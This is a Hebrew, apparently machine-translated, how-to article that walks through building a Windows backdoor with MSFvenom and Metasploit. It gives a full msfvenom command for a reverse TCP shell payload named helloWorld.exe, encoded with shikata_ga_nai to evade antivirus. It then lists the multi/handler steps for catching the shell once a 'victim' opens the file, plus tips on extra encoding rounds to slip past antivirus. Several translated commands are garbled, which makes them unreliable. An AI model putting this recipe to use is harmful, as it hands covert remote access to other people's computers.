דלת אחורית משמשת לעקיפת מנגנוני אבטחה, לרוב בחשאי ובעיקר ללא גילוי. באמצעות MSFvenom, השילוב של msfpayload ו- msfencode, ניתן ליצור דלת אחורית המתחברת חזרה לתוקף באמצעות TCP מעטפת הפוכה. על מנת לפתח דלת אחורית, עליך לשנות את חתימת התוכנה הזדונית שלך כדי להתחמק מכל תוכנת אנטי וירוס. השלימו את הפרויקט הזה על זוג מחשבים שאליהם יש לכם הרשאה לגשת, ותוך כדי כך תוכלו ללמוד עוד על אבטחת מחשבים ועל אופן הפעולה של דלת אחורית.
צעדים
שלב 1. הפעל את Kali והפעל את מסוף הטרמינל
שלב 2. הקלד ifconfig כדי להציג את הממשק ובדוק את כתובת ה- IP שלך
שלב 3. הקלד מקודדים msfvenom -l כדי להציג את רשימת המקודדים
תשתמש ב- x86/shikata_ga_nai כמקודד
שלב 4. הקלד "msfvenom -a x86 -פלטפורמת windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -A x86 -Windows פלטפורמה מייצגת ארכיטקטורה לשימוש.
- -p windows/shell/reverse_tcp מייעד את המטען להטמעה.
- LHOST מייעד את כתובת ה- IP של המאזין.
- LPORT מייעד את יציאת המאזין.
- -b "\ x00" מציין להימנע מתו רע (בתים null).
- -e x86/shikata_ga_nai מציין את שם המקודדים.
- -f exe> helloWorld.exe מציין פלט פורמט.
שלב 5. הקלד msfconsole להפעלת Metasploit
עכשיו יצרת את הדלת האחורית שלך. כאשר הקורבן לוחץ על helloWorld.exe, מטען המעטפת המוטמע יופעל ויחזור למערכת שלך. על מנת לקבל את החיבור, עליך לפתוח את המטפל המרובה ב- Metasploit ולהגדיר את המטען
שלב 6. הקלד use exploit/multi/handler
שלב 7. הקלד הגדרות מטען windows/shell/reverse_tcp
שלב 8. הקלד אפשרויות הצג כדי לבדוק את המודול
שלב 9. הקלד set LHOST 192.168.48.129
"LHOST" מציין את כתובת ה- IP של המאזין
שלב 10. הקלד סט LPORT 4444
"LPORT" מציין את יציאת המאזין
שלב 11. הקלד הפעלה והמתן לחיבור מהמכונה של הקורבן
שלב 12. המתן עד שהקורבן ילחץ על helloWorld.exe
אז תהיה מחובר בהצלחה למכונה של הקורבן.
טיפים
- שימוש ב- -i ב- MSFvenom ייצג את האיטרציות של הקידוד. לפעמים חזרות נוספות עשויות לעזור להתחמק מתוכנת AV.
- למדת כיצד ליצור את הדלת האחורית והמקודדת באמצעות MSFvenom, אך שיטה זו לא תפעל בצורה מושלמת נגד חלק מתוכנות ה- AV בימינו. הסיבה מאחורי זה היא בגלל תבניות הביצוע ב- MSFvenom. ספקי ה- AV הוסיפו את החתימה הסטטית של התבניות האלה ופשוט חפשו אותן. הפתרון לבעיה זו הוא שימוש בתבנית ביצוע שונה או בכלים שונים.